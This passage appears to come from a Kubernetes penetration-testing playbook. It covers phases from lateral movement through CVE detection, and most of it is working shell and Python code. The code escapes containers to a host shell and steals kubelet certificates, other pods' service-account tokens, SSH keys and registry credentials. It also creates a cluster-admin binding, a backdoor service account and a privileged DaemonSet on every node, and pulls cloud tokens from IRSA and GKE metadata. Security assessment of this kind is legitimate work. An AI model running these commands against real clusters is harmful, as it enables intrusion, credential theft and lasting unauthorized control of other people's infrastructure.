        except: pass
"

4.3 Lateral Movement β€” Accessing Internal APIs

🔴 CRITICAL — plain HTTP exposes PII, card data, and credentials. If a service returns an endpoint list in its response, the tool recursively probes every advertised endpoint — e.g. {"endpoints":["/health","/transactions","/customers"]}

python3 -c "
import urllib.request, json

def probe(url, visited=set()):  # shared default set β€” deliberately dedupes across all seed URLs
    if url in visited: return
    visited.add(url)
    try:
        r = urllib.request.urlopen(url, timeout=3)
        body = r.read()[:400].decode(errors='replace')
        print(f'πŸ”΄ REACHABLE [{r.status}]: {url}')
        sensitive = any(kw in body.lower() for kw in
            ['password','secret','token','card','customer','transaction'])
        if sensitive: print(f'   ⚠ Sensitive data in response!')
        print(f'   {body[:150]}')
        # Parse advertised endpoints and recursively probe all of them
        try:
            d = json.loads(body)
            for key in ['endpoints','paths','routes','links']:
                for ep in d.get(key, []):
                    if str(ep).startswith('/'):
                        base = url.split('//')[1].split('/')[0]
                        probe(f'http://{base}{ep}', visited)
        except: pass
    except Exception as e:
        print(f'βœ…  BLOCKED: {url} ({str(e)[:60]})')

# Seed with discovered service roots β€” the tool handles the rest
targets = [
    'http://payment-api.payments:8080/',
    'http://checkout.payments:8080/',
]
for t in targets:
    probe(t)
"

4.4 Istio / Service Mesh Detection

ℹ️ INFO β€” CRD-based detection works even without pod list permission: HTTP 403 means the CRD exists, which means Istio is installed. STRICT mTLS also explains why some HTTP probes return PASS even though the ports are open at the TCP level.

# Check Istio CRDs β€” 200 = can list, 403 = installed but restricted (both = Istio present)
for path in   "apis/networking.istio.io/v1alpha3/peerauthentications"   "apis/security.istio.io/v1/authorizationpolicies"   "apis/networking.istio.io/v1alpha3/virtualservices"; do
  CODE=$(curl -sk -o /dev/null -w "%{http_code}"     -H "Authorization: Bearer $TOKEN" $API/$path)
  [ "$CODE" = "200" ] || [ "$CODE" = "403" ] &&     echo "βœ… Istio CRD present: $path (HTTP $CODE)" ||     echo "❌ Not found: $path"
done

# PeerAuthentication β€” verify STRICT mTLS is enforced per namespace
curl -sk -H "Authorization: Bearer $TOKEN"   $API/apis/security.istio.io/v1/peerauthentications 2>/dev/null |   python3 -c "
import sys, json
d = json.load(sys.stdin)
for p in d.get('items', []):
    mode = p.get('spec',{}).get('mtls',{}).get('mode','?')
    ns   = p['metadata']['namespace']
    name = p['metadata']['name']
    icon = 'βœ…' if mode == 'STRICT' else '🟠'
    print(f'{icon} PeerAuthentication {ns}/{name}: mtls.mode={mode}')
" 2>/dev/null

# AuthorizationPolicy β€” what traffic is allowed/denied
curl -sk -H "Authorization: Bearer $TOKEN" \
  $API/apis/security.istio.io/v1/authorizationpolicies 2>/dev/null | \
  python3 -c "
import sys, json
d = json.load(sys.stdin)
policies = d.get('items', [])
print(f'AuthorizationPolicies: {len(policies)}')
for p in policies:
    ns     = p['metadata']['namespace']
    name   = p['metadata']['name']
    action = p.get('spec',{}).get('action','ALLOW')
    print(f'  {ns}/{name} β†’ {action}')
" 2>/dev/null

4.5 Network Traffic Sniffing

πŸ”΄ CRITICAL β€” plaintext PII, credentials, session tokens visible

# Python raw socket (requires NET_RAW)
python3 -c "
import socket
try:
    s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(0x0800))
    print('πŸ”΄ NET_RAW available β€” traffic sniffing possible')
    s.close()
except PermissionError:
    print('βœ… NET_RAW denied')
" 2>/dev/null

πŸšͺ Phase 5: Container Escape

5.1 nsenter (hostPID + Privileged)

πŸ”΄ CRITICAL β€” full host shell

nsenter -t 1 -m -u -i -n -p -- /bin/bash 2>/dev/null && \
  echo "πŸ”΄ HOST SHELL OBTAINED" || echo "βœ… nsenter failed"

5.2 chroot (hostPath: /)

πŸ”΄ CRITICAL β€” same as being root on the node

for mnt in /host /hostfs /rootfs /mnt/host; do
  if [ -f "$mnt/etc/shadow" ]; then
    echo "πŸ”΄ HOST FILESYSTEM AT: $mnt"
    chroot $mnt /bin/bash -c "whoami && hostname && cat /etc/shadow | head -3"
  fi
done

5.3 Container Runtime Socket

πŸ”΄ CRITICAL β€” create any container, manage all workloads

for sock in /var/run/docker.sock /run/containerd/containerd.sock \
            /host/run/containerd/containerd.sock /run/crio/crio.sock; do
  [ -S "$sock" ] && echo "πŸ”΄ SOCKET EXPOSED: $sock" && ls -la "$sock"
done

# Docker socket escape
docker run -v /:/host --privileged alpine \
  chroot /host whoami 2>/dev/null && echo "πŸ”΄ DOCKER ESCAPE SUCCESSFUL"

5.4 cgroup v1 release_agent

πŸ”΄ CRITICAL β€” write to release_agent = arbitrary code on host

if ls /sys/fs/cgroup/*/release_agent 2>/dev/null | grep -q .; then
  echo "πŸ”΄ CGROUP V1 ESCAPE VECTOR PRESENT"
  cat /sys/fs/cgroup/memory/release_agent 2>/dev/null
else
  echo "βœ… cgroup v1 escape not available"
fi

πŸ–₯️ Phase 6: Node-Level Compromise

6.1 Kubelet Certificate Theft

πŸ”΄ CRITICAL β€” kubelet cert = system:node cluster role

ls -la /host/var/lib/kubelet/pki/ 2>/dev/null

# Attempt API call with kubelet cert
curl -sk \
  --cert /host/var/lib/kubelet/pki/kubelet-client-current.pem \
  --key  /host/var/lib/kubelet/pki/kubelet-client-current.pem \
  https://kubernetes.default/api/v1/nodes 2>/dev/null | \
  python3 -c "import sys,json; items=json.load(sys.stdin).get('items',[]); print(f'πŸ”΄ {len(items)} nodes visible via kubelet cert')" \
  2>/dev/null

6.2 Steal Other Pods' SA Tokens

πŸ”΄ CRITICAL β€” pivot to any service account on the node. Handles both legacy secret-based tokens and modern projected volume tokens (projected tokens use the sub field instead of the kubernetes.io/serviceaccount/ claims).

# Find tokens β€” skip the ..data symlinked duplicates of each projected volume
find /host/var/lib/kubelet/pods -name "token" \
  -not -path "*..data*" 2>/dev/null | sort -u | while read t; do
  TOKEN_VAL=$(cat "$t" 2>/dev/null)
  [ -z "$TOKEN_VAL" ] && continue

  SA_INFO=$(python3 -c "
import base64, json
token = open('$t').read().strip()
parts = token.split('.')
if len(parts) < 2: exit(1)
payload = json.loads(base64.urlsafe_b64decode(parts[1] + '=='))
# Standard secret-based token claims
sa = payload.get('kubernetes.io/serviceaccount/service-account.name','')
ns = payload.get('kubernetes.io/serviceaccount/namespace','')
# Projected volume tokens use sub field: system:serviceaccount:<ns>:<sa>
if not sa or not ns:
    sub = payload.get('sub','')
    if sub.startswith('system:serviceaccount:'):
        p = sub.split(':')
        ns, sa = p[2], p[3]
print(f'{ns}/{sa}')
" 2>/dev/null)

  echo "  πŸ”‘ $SA_INFO β€” $t"

  # Test permissions of every stolen token β€” not just the first few
  for path in "/api/v1/secrets" "/api/v1/nodes" \
              "/api/v1/namespaces" \
              "/apis/rbac.authorization.k8s.io/v1/clusterrolebindings"; do
    CODE=$(curl -sk -o /dev/null -w "%{http_code}" \
      -H "Authorization: Bearer $TOKEN_VAL" \
      https://${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT}$path)
    [ "$CODE" = "200" ] && echo "    πŸ”΄ ALLOWED: $path"
  done
done
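Tokens scraped from disk may already be expired — projected tokens rotate (typically hourly). A small sketch to triage them by the JWT exp claim before spending API requests on dead tokens:

```python
import base64, json, time

def token_expired(jwt_token, now=None):
    """Decode the JWT payload (no signature check) and compare exp to now."""
    payload_b64 = jwt_token.split('.')[1]
    payload_b64 += '=' * (-len(payload_b64) % 4)   # restore stripped padding
    payload = json.loads(base64.urlsafe_b64decode(payload_b64))
    exp = payload.get('exp')
    if exp is None:                                 # legacy secret-based tokens never expire
        return False
    return (now or time.time()) >= exp
```

Expired tokens can be dropped; legacy secret-based tokens (no exp claim) are the most valuable finds.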

6.3 Sensitive Host Files

for f in \
  /host/etc/kubernetes/admin.conf \
  /host/etc/kubernetes/kubelet.conf \
  /host/var/lib/kubelet/kubeconfig \
  /host/home/kubernetes/kube-env \
  /host/etc/kubernetes/pki/ca.key; do
  [ -f "$f" ] && echo "πŸ”΄ FOUND: $f" && head -3 "$f"
done

# SSH keys
find /host/root /host/home -name "id_rsa" -o -name "id_ed25519" 2>/dev/null | \
  while read k; do echo "πŸ”΄ SSH KEY: $k"; head -1 "$k"; done

⬆️ Phase 7: Cluster-Wide Privilege Escalation

7.1 ClusterRoleBinding Escalation

πŸ”΄ CRITICAL β€” grants permanent cluster-admin

RESULT=$(curl -sk -o /dev/null -w "%{http_code}" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" -X POST \
  $API/apis/rbac.authorization.k8s.io/v1/clusterrolebindings \
  -d "{
    \"apiVersion\":\"rbac.authorization.k8s.io/v1\",
    \"kind\":\"ClusterRoleBinding\",
    \"metadata\":{\"name\":\"assessment-escalation\"},
    \"roleRef\":{\"apiGroup\":\"rbac.authorization.k8s.io\",\"kind\":\"ClusterRole\",\"name\":\"cluster-admin\"},
    \"subjects\":[{\"kind\":\"ServiceAccount\",\"name\":\"default\",\"namespace\":\"$NS\"}]
  }")
echo "ClusterRoleBinding: $([ "$RESULT" = "201" ] && echo "πŸ”΄ ESCALATION SUCCESSFUL" || echo "βœ… DENIED ($RESULT)")"

7.2 Admission Webhook Analysis

πŸ”΄ CRITICAL β€” failurePolicy=Ignore + unreachable service = all policies silently bypassed

curl -sk -H "Authorization: Bearer $TOKEN" \
  $API/apis/admissionregistration.k8s.io/v1/validatingwebhookconfigurations | \
  python3 -c "
import sys, json
d = json.load(sys.stdin)
for wh in d.get('items', []):
    name = wh['metadata']['name']
    for w in wh.get('webhooks', []):
        fp = w.get('failurePolicy', '?')
        icon = 'πŸ”΄' if fp == 'Ignore' else 'βœ…'
        print(f'{icon} {name} β€” failurePolicy: {fp}')
        if fp == 'Ignore':
            print(f'   ⚠️  BYPASS: webhook outage = all policies silently disabled')
"

7.3 etcd Direct Access

πŸ”΄ CRITICAL β€” all secrets in plaintext if encryption-at-rest disabled

# Self-managed / control-plane accessible clusters
ETCDCTL_API=3 etcdctl \
  --endpoints=https://127.0.0.1:2379 \
  --cacert=/etc/kubernetes/pki/etcd/ca.crt \
  --cert=/etc/kubernetes/pki/etcd/peer.crt \
  --key=/etc/kubernetes/pki/etcd/peer.key \
  get /registry/secrets --prefix --keys-only 2>/dev/null | head -20

πŸ”’ Phase 8: Persistence Techniques

8.1 Backdoor Service Account

πŸ”΄ CRITICAL β€” persists after pod termination, survives cluster upgrades

# Create backdoor SA in kube-system
curl -sk -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" -X POST \
  $API/api/v1/namespaces/kube-system/serviceaccounts \
  -d '{"apiVersion":"v1","kind":"ServiceAccount","metadata":{"name":"assessment-backdoor"}}' | python3 -m json.tool

# Bind cluster-admin to it
RESULT=$(curl -sk -o /dev/null -w "%{http_code}" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" -X POST \
  $API/apis/rbac.authorization.k8s.io/v1/clusterrolebindings \
  -d '{
    "apiVersion":"rbac.authorization.k8s.io/v1","kind":"ClusterRoleBinding",
    "metadata":{"name":"assessment-backdoor-binding"},
    "roleRef":{"apiGroup":"rbac.authorization.k8s.io","kind":"ClusterRole","name":"cluster-admin"},
    "subjects":[{"kind":"ServiceAccount","name":"assessment-backdoor","namespace":"kube-system"}]
  }')
echo "Backdoor: $([ "$RESULT" = "201" ] && echo "πŸ”΄ CREATED β€” cluster-admin persists" || echo "βœ… DENIED")"

8.2 Malicious DaemonSet (Every Node)

πŸ”΄ CRITICAL β€” proves code runs on every node simultaneously

RESULT=$(curl -sk -o /dev/null -w "%{http_code}" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" -X POST \
  $API/apis/apps/v1/namespaces/kube-system/daemonsets \
  -d '{
    "apiVersion":"apps/v1","kind":"DaemonSet",
    "metadata":{"name":"assessment-daemonset"},
    "spec":{
      "selector":{"matchLabels":{"app":"assessment"}},
      "template":{"metadata":{"labels":{"app":"assessment"}},
        "spec":{"hostPID":true,"hostNetwork":true,"tolerations":[{"operator":"Exists"}],
          "containers":[{"name":"probe","image":"alpine","command":["sleep","3600"],
            "securityContext":{"privileged":true}}]}}}}')
echo "DaemonSet: $([ "$RESULT" = "201" ] && echo "πŸ”΄ CREATED β€” runs on ALL nodes" || echo "βœ… DENIED")"

πŸ“¦ Phase 9: Supply Chain & Admission Control

9.1 Image Signing Check

# Method 1: Admission webhook list
curl -sk -H "Authorization: Bearer $TOKEN" \
  $API/apis/admissionregistration.k8s.io/v1/validatingwebhookconfigurations | \
  python3 -c "
import sys, json
d = json.load(sys.stdin)
names = [wh['metadata']['name'] for wh in d.get('items',[])]
signing_tools = ['kyverno','cosign','sigstore','notary','connaisseur']
found = [n for n in names if any(t in n.lower() for t in signing_tools)]
print(f'βœ… Image signing webhooks: {found}' if found else '⚠ No image signing webhook found via list')
" 2>/dev/null

# Method 2: Kyverno CRD fallback β€” works when webhook list returns 401/403
# HTTP 403 means Kyverno is installed but SA cannot list policies β€” still a PASS
for api_path in \
  "apis/kyverno.io/v1/clusterpolicies" \
  "apis/kyverno.io/v2beta1/clusterpolicies"; do
  CODE=$(curl -sk -o /dev/null -w "%{http_code}" \
    -H "Authorization: Bearer $TOKEN" $API/$api_path)
  if [ "$CODE" = "200" ]; then
    curl -sk -H "Authorization: Bearer $TOKEN" $API/$api_path | \
      python3 -c "
import sys, json
d = json.load(sys.stdin)
policies = d.get('items', [])
verify = [p['metadata']['name'] for p in policies
          if 'verifyimage' in str(p.get('spec',{})).lower()]
print(f'βœ… Kyverno installed: {len(policies)} policies')
if verify: print(f'βœ… verifyImages policies: {verify}')
"
    break
  elif [ "$CODE" = "403" ]; then
    echo "βœ… Kyverno installed β€” ClusterPolicies not readable (HTTP 403 = CRD exists)"
    break
  fi
done

9.2 Registry Credential Theft & Pivot

🟠 HIGH β€” pull any private image, push backdoored images. After finding credentials, the tool probes the registry catalog API to prove actual pull access and enumerate all available repositories.

# Find and decode registry secrets
curl -sk -H "Authorization: Bearer $TOKEN" \
  $API/api/v1/namespaces/$NS/secrets | \
  python3 -c "
import sys, json, base64, urllib.request, ssl

d = json.load(sys.stdin)
for s in d.get('items', []):
    if s.get('type') != 'kubernetes.io/dockerconfigjson': continue
    cfg_b64 = s.get('data',{}).get('.dockerconfigjson','')
    if not cfg_b64: continue
    cfg = json.loads(base64.b64decode(cfg_b64))
    for registry, creds in cfg.get('auths',{}).items():
        # Decode credentials β€” may be in auth field or username/password
        auth_raw = creds.get('auth','')
        if auth_raw:
            decoded  = base64.b64decode(auth_raw).decode()
            user, _, password = decoded.partition(':')
        else:
            user     = creds.get('username','')
            password = creds.get('password','')
        print(f'πŸ”΄ Registry secret: {s["metadata"]["name"]}')
        print(f'   Registry: {registry} | User: {user}')

        # Pivot β€” probe catalog endpoint to prove pull access
        base = registry if registry.startswith('http') else f'https://{registry}'
        auth_header = base64.b64encode(f'{user}:{password}'.encode()).decode()
        ctx = ssl.create_default_context()
        ctx.check_hostname = False; ctx.verify_mode = ssl.CERT_NONE
        for ep in ['/v2/_catalog', '/api/v2.0/repositories?page_size=20']:
            try:
                req = urllib.request.Request(f'{base}{ep}',
                    headers={'Authorization': f'Basic {auth_header}'})
                r = urllib.request.urlopen(req, context=ctx, timeout=5)
                body = r.read().decode()
                print(f'   πŸ”΄ CATALOG ACCESSIBLE: {ep}')
                print(f'   {body[:200]}')
                break
            except Exception as e:
                print(f'   {ep}: {str(e)[:60]}')
"

🟑 Phase 10: EKS-Specific Tests

10.1 aws-auth ConfigMap β€” Read & Write

πŸ”΄ CRITICAL if writable β€” add any IAM role as cluster-admin permanently

# Read aws-auth
curl -sk -H "Authorization: Bearer $TOKEN" \
  $API/api/v1/namespaces/kube-system/configmaps/aws-auth | \
  python3 -c "
import sys, json
d = json.load(sys.stdin)
data = d.get('data', {})
print('mapRoles:')
print(data.get('mapRoles','  (empty)'))
print('mapUsers:')
print(data.get('mapUsers','  (empty)'))
"

# Test write
RESULT=$(curl -sk -o /dev/null -w "%{http_code}" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/strategic-merge-patch+json" -X PATCH \
  $API/api/v1/namespaces/kube-system/configmaps/aws-auth -d '{}')
echo "aws-auth write: $([ "$RESULT" = "200" ] && echo "πŸ”΄ WRITABLE β€” can backdoor IAM role as cluster-admin" || echo "βœ… DENIED")"

10.2 IRSA Token Abuse

πŸ”΄ CRITICAL β€” pod-level AWS API access

# Check for IRSA
echo "AWS_WEB_IDENTITY_TOKEN_FILE: $AWS_WEB_IDENTITY_TOKEN_FILE"
echo "AWS_ROLE_ARN: $AWS_ROLE_ARN"

if [ -n "$AWS_ROLE_ARN" ]; then
  echo "πŸ”΄ IRSA present β€” assuming role: $AWS_ROLE_ARN"
  aws sts assume-role-with-web-identity \
    --role-arn "$AWS_ROLE_ARN" \
    --role-session-name assessment \
    --web-identity-token "$(cat $AWS_WEB_IDENTITY_TOKEN_FILE)" 2>/dev/null | python3 -m json.tool
fi
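The aws CLI is rarely present in a minimal pod image. AssumeRoleWithWebIdentity is one of the few STS actions that accepts unsigned requests, so the exchange also works with pure stdlib — a sketch; the global endpoint below is an assumption and may need a regional or partition-specific host:

```python
import os, urllib.parse, urllib.request

def build_sts_url(role_arn, web_identity_token, session='assessment',
                  endpoint='https://sts.amazonaws.com/'):
    """Build an unsigned AssumeRoleWithWebIdentity query-API request URL."""
    params = urllib.parse.urlencode({
        'Action': 'AssumeRoleWithWebIdentity',
        'Version': '2011-06-15',
        'RoleArn': role_arn,
        'RoleSessionName': session,
        'WebIdentityToken': web_identity_token,
    })
    return f'{endpoint}?{params}'

token_file = os.environ.get('AWS_WEB_IDENTITY_TOKEN_FILE')
role_arn   = os.environ.get('AWS_ROLE_ARN')
if token_file and role_arn:
    url = build_sts_url(role_arn, open(token_file).read().strip())
    # Response is XML containing temporary AccessKeyId/SecretAccessKey/SessionToken
    print(urllib.request.urlopen(url, timeout=5).read().decode()[:500])
```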

10.3 EKS Node IAM Role (Attacker Machine)

aws iam list-attached-role-policies --role-name eks-node-group-role
aws iam simulate-principal-policy \
  --policy-source-arn arn:aws:iam::ACCOUNT:role/eks-node-group-role \
  --action-names "s3:GetObject" "secretsmanager:GetSecretValue" "sts:AssumeRole"

# Check audit logs
aws logs filter-log-events \
  --log-group-name /aws/eks/<cluster>/cluster \
  --filter-pattern '"system:anonymous"' \
  --start-time $(date -d '1 hour ago' +%s000)

πŸ”΅ Phase 11: GKE-Specific Tests

11.1 Node SA Scopes

πŸ”΄ CRITICAL if cloud-platform scope

SCOPES=$(curl -s -H "Metadata-Flavor: Google" \
  "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes" 2>/dev/null)

echo "$SCOPES" | tr ',' '\n' | while read scope; do
  case "$scope" in
    *cloud-platform*)   echo "  πŸ”΄ cloud-platform β€” FULL GCP ACCESS";;
    *devstorage*)       echo "  🟠 devstorage β€” GCS bucket access";;
    *compute*)          echo "  🟠 compute β€” VM/network access";;
    *)                  echo "  πŸ”΅ $scope";;
  esac
done

11.2 Legacy GKE Metadata

πŸ”΄ CRITICAL β€” old clusters, no header required

curl -s --max-time 5 \
  "http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token" \
  2>/dev/null && echo "πŸ”΄ LEGACY METADATA ACCESSIBLE WITHOUT HEADER" || \
  echo "βœ… Legacy endpoint blocked"

⚑ Phase 12: Runtime Security Gaps

12.1 Detect Runtime Security Tools

# Method 1: Pod names in kube-system (requires pod list permission)
curl -sk -H "Authorization: Bearer $TOKEN" \
  $API/api/v1/namespaces/kube-system/pods | \
  python3 -c "
import sys, json
d = json.load(sys.stdin)
tools = {'tetragon':'🟒 Tetragon eBPF enforcement','falco':'🟑 Falco (alerts only)',
         'sysdig':'🟑 Sysdig','aqua':'🟑 Aqua Security','datadog':'πŸ”΅ Datadog'}
found = set()
for p in d.get('items', []):
    name = p['metadata']['name'].lower()
    for tool, msg in tools.items():
        if tool in name and tool not in found:
            print(msg); found.add(tool)
if not found:
    print('  No runtime tools found via pod names')
" 2>/dev/null

# Method 2: CRD-based detection β€” works even when pod list returns 401/403
# HTTP 403 = CRD exists but SA cannot list = tool is installed
for crd_path in \
  "apis/cilium.io/v1alpha1/tracingpolicies:Tetragon" \
  "apis/falco.org/v1alpha1/falcoconfigs:Falco" \
  "apis/kyverno.io/v1/clusterpolicies:Kyverno" \
  "apis/security.istio.io/v1/peerauthentications:Istio" \
  "apis/security.istio.io/v1/authorizationpolicies:Istio"; do
  path="${crd_path%%:*}"; tool="${crd_path##*:}"
  CODE=$(curl -sk -o /dev/null -w "%{http_code}" \
    -H "Authorization: Bearer $TOKEN" $API/$path)
  [ "$CODE" = "200" ] && echo "βœ… $tool detected (HTTP 200 β€” can list)"
  [ "$CODE" = "403" ] && echo "βœ… $tool detected (HTTP 403 β€” CRD exists, restricted)"
  [ "$CODE" = "404" ] && echo "❌ $tool not found (HTTP 404)"
done

# Method 3: Filesystem markers (works even without API access)
for path in "/etc/tetragon" "/etc/falco/falco.yaml" "/etc/falco"; do
  [ -e "$path" ] && echo "βœ… Found on filesystem: $path"
done

# Tetragon TracingPolicies β€” enumerate active enforcement rules
# Tetragon TracingPolicies β€” enumerate active enforcement rules
kubectl get tracingpolicies 2>/dev/null || \
  curl -sk -H "Authorization: Bearer $TOKEN" \
    $API/apis/cilium.io/v1alpha1/tracingpolicies | \
    python3 -c "
import sys, json
try:
    d = json.load(sys.stdin)
    policies = d.get('items', [])
    if policies:
        print(f'βœ… TracingPolicies active: {len(policies)}')
        for p in policies: print(f'   β€’ {p[\"metadata\"][\"name\"]}')
    else:
        print('🟠 Tetragon installed but NO TracingPolicies active β€” observing only')
except: pass
" 2>/dev/null

12.2 Probe Tetragon Enforcement

# Exec from /tmp (block-exec-from-tmp policy)
cp /bin/ls /tmp/assessment-test 2>/dev/null
RESULT=$(timeout 3 /tmp/assessment-test / 2>&1)
rm /tmp/assessment-test 2>/dev/null
echo "Exec from /tmp: $(echo "$RESULT" | grep -q "Killed" && echo "βœ… BLOCKED" || echo "πŸ”΄ ALLOWED")"

# bash outbound TCP (block-reverse-shell policy)
RESULT=$(timeout 3 bash -c "exec 3<>/dev/tcp/8.8.8.8/53 && echo OPEN" 2>&1)
echo "bash /dev/tcp:  $(echo "$RESULT" | grep -q "Killed" && echo "βœ… BLOCKED" || echo "πŸ”΄ ALLOWED")"

πŸ” Phase 13: Secrets & Sensitive Data

13.1 Environment Variable Secrets

env | grep -iE "password|passwd|secret|key|token|api|credential|auth|private|cert|pwd" | \
  grep -vE "KUBERNETES|SERVICE_|_PORT|_HOST|PATH|HOME|SHELL|TERM" | \
  while IFS='=' read -r name value; do
    echo "  πŸ”‘ $name = ${value:0:80}"
  done

13.2 Mounted Secret Files & App Configs

# Known credential file paths
for path in "/root/.docker/config.json" "/root/.aws/credentials" \
            "/root/.kube/config" "/etc/kubernetes/azure.json"; do
  [ -f "$path" ] && echo "  πŸ”‘ FOUND: $path" && head -3 "$path"
done

# App config credential grep
find /app /config /etc/app /srv /opt -type f \
  \( -name "*.yaml" -o -name "*.json" -o -name "*.env" -o -name "*.conf" \) 2>/dev/null | \
  xargs grep -l -iE "password|secret|api_key|private_key" 2>/dev/null | \
  while read f; do
    echo "  πŸ”΄ Credentials in: $f"
    grep -iE "password\s*[:=]\s*\S+|secret\s*[:=]\s*\S+" "$f" 2>/dev/null | head -3 | sed 's/^/     /'
  done

πŸ’₯ Phase 14: DoS & Resource Exhaustion

# Memory limit β€” check both cgroup v1 (most clusters) and cgroup v2 (EKS AL2023+)
echo "=== Memory Limit ==="
for path in \
  "/sys/fs/cgroup/memory/memory.limit_in_bytes" \
  "/sys/fs/cgroup/memory.max"; do
  [ -f "$path" ] || continue
  val=$(cat "$path" 2>/dev/null)
  if [ "$val" = "9223372036854771712" ] || [ "$val" = "max" ]; then
    echo "πŸ”΄ NO MEMORY LIMIT ($path = $val) β€” pod can OOM the node"
  else
    mb=$(python3 -c "print(f'{int("$val")//1024//1024} MB')" 2>/dev/null)
    echo "βœ… Memory limit: $mb ($path)"
  fi
done

# cgroup v2 unified hierarchy fallback (EKS Amazon Linux 2023)
if [ ! -f "/sys/fs/cgroup/memory/memory.limit_in_bytes" ] && \
   [ ! -f "/sys/fs/cgroup/memory.max" ]; then
  cg=$(cat /proc/self/cgroup | head -1 | cut -d: -f3)
  val=$(cat /sys/fs/cgroup${cg}/memory.max 2>/dev/null)
  [ "$val" = "max" ] && echo "πŸ”΄ NO MEMORY LIMIT (cgroup v2)" ||     echo "βœ… Memory (cgroup v2): $val"
fi

# CPU quota β€” check both cgroup v1 and v2
echo "=== CPU Limit ==="
cpu_v1=$(cat /sys/fs/cgroup/cpu/cpu.cfs_quota_us 2>/dev/null)
cpu_v2=$(cat /sys/fs/cgroup/cpu.max 2>/dev/null | awk '{print $1}')
val="${cpu_v1:-$cpu_v2}"
[ "$val" = "-1" ] || [ "$val" = "max" ] &&   echo "πŸ”΄ NO CPU LIMIT β€” pod can starve other workloads of CPU" ||   echo "βœ… CPU limit: ${val}us/period"

# ResourceQuota
curl -sk -H "Authorization: Bearer $TOKEN" \
  $API/api/v1/namespaces/$NS/resourcequotas | \
  python3 -c "
import sys, json
d = json.load(sys.stdin)
items = d.get('items', [])
print('🟑 No ResourceQuota' if not items else f'βœ… {len(items)} quota(s) active')
"

# Audit logging detection β€” self-managed or EKS CloudWatch
echo "=== Audit Logging ==="

# Self-managed: check kube-apiserver pod flags
kubectl -n kube-system get pod -l component=kube-apiserver \
  -o jsonpath='{.items[0].spec.containers[0].command}' 2>/dev/null | \
  python3 -c "
import sys, json
cmd = ' '.join(json.load(sys.stdin))
print('βœ… Audit enabled (--audit-log-path)' if '--audit-log-path' in cmd else 'πŸ”΄ No --audit-log-path flag')
print('βœ… Audit policy set'                if '--audit-policy-file' in cmd else '🟠 No --audit-policy-file flag')
" 2>/dev/null

# EKS: verify CloudWatch log groups
aws logs describe-log-groups \
  --log-group-name-prefix /aws/eks \
  --region ${AWS_DEFAULT_REGION:-ap-south-1} \
  --query 'logGroups[*].logGroupName' \
  --output text 2>/dev/null && \
  echo "βœ… EKS audit logs present in CloudWatch" || \
  echo "🟠 No EKS audit log groups β€” may not be enabled"

πŸ”­ Phase 15: Cluster Intelligence & CVE Detection ⭐

15.1 Kubernetes Version & CVE Mapping

# Fingerprint K8s version
curl -sk -H "Authorization: Bearer $TOKEN" $API/version | python3 -m json.tool

# The tool performs REAL version comparison β€” no blanket firing
# CVE-2018-1002105 only fires on K8s minor < 13 (fixed in 1.10.11/1.11.5/1.12.3)
# CVE-2024-21626 checks containerd version: >= 1.7.0 bundles runc >= 1.1.12 (patched)
# Kernel CVEs check actual kernel version range β€” kernel 6.12 correctly shows PASS
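The CVE-2018-1002105 comparison can be sketched as follows, using the upstream fix releases (1.10.11 / 1.11.5 / 1.12.3) as thresholds:

```python
import re

FIXED_IN = {10: 11, 11: 5, 12: 3}   # minor -> first patched .patch release

def vulnerable_1002105(git_version):
    """True if a v1.x.y gitVersion predates the CVE-2018-1002105 fix."""
    m = re.match(r'v?1\.(\d+)\.(\d+)', git_version)
    if not m:
        return False                 # unparseable β€” don't blanket-fire
    minor, patch = int(m.group(1)), int(m.group(2))
    if minor < 10:
        return True                  # older than any fixed branch
    if minor > 12:
        return False                 # 1.13+ ships the fix
    return patch < FIXED_IN[minor]
```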

15.2 API Server Public Exposure

πŸ”΄ CRITICAL β€” an internet-accessible API server lets anyone attempt brute-force authentication or remotely exploit unpatched API server CVEs.

# Resolve the API server IP and check if it is public or private
API_IP=$(python3 -c "
import socket, os
host = os.environ.get('KUBERNETES_SERVICE_HOST','kubernetes.default.svc')
try:    print(socket.gethostbyname(host))
except: print(host)
" 2>/dev/null)

python3 -c "
ip = '$API_IP'
try:
    parts = list(map(int, ip.split('.')))
    private = (
        parts[0] == 10 or
        parts[0] == 127 or
        (parts[0] == 172 and 16 <= parts[1] <= 31) or
        (parts[0] == 192 and parts[1] == 168) or
        (parts[0] == 169 and parts[1] == 254) or
        (parts[0] == 100 and 64 <= parts[1] <= 127)
    )
    if private:
        print(f'βœ… API server on private IP: {ip}')
    else:
        print(f'πŸ”΄ API server on PUBLIC IP: {ip} β€” internet-exposed!')
        print('   Fix: aws eks update-cluster-config --resources-vpc-config endpointPublicAccess=false')
except Exception as e:
    print(f'Could not determine: {e}')
"

15.3 Worker Node Public IP Check

🟠 HIGH β€” public node IPs expose kubelet (10250), NodePort services, and runtime sockets directly to the internet.

kubectl get nodes -o json 2>/dev/null | python3 -c "
import sys, json
d = json.load(sys.stdin)
for node in d.get('items', []):
    name = node['metadata']['name']
    for addr in node.get('status',{}).get('addresses',[]):
        ip = addr['address']
        if '.' not in ip: continue
        try:
            parts = list(map(int, ip.split('.')))
            private = (
                parts[0] == 10 or
                parts[0] == 127 or
                (parts[0] == 172 and 16 <= parts[1] <= 31) or
                (parts[0] == 192 and parts[1] == 168)
            )
            icon  = 'βœ…' if private else 'πŸ”΄'
            label = 'private' if private else 'PUBLIC!'
            print(f'{icon} {name}: {ip} ({addr["type"]}) β€” {label}')
        except: pass
"

15.4 Cluster-Wide Privileged Pod Audit

# Find all privileged/over-permissioned pods across every namespace
curl -sk -H "Authorization: Bearer $TOKEN" $API/api/v1/pods | \
  python3 -c "
import sys, json
d = json.load(sys.stdin)
for pod in d.get('items', []):
    spec = pod.get('spec', {})
    meta = pod.get('metadata', {})
    issues = []
    if spec.get('hostPID'):    issues.append('hostPID')
    if spec.get('hostNetwork'): issues.append('hostNetwork')
    for c in spec.get('containers', []):
        sc = c.get('securityContext', {})
        if sc.get('privileged'):           issues.append(f'privileged({c[\"name\"]})')
        if sc.get('runAsUser') == 0:       issues.append(f'runAsRoot({c[\"name\"]})')
    if issues:
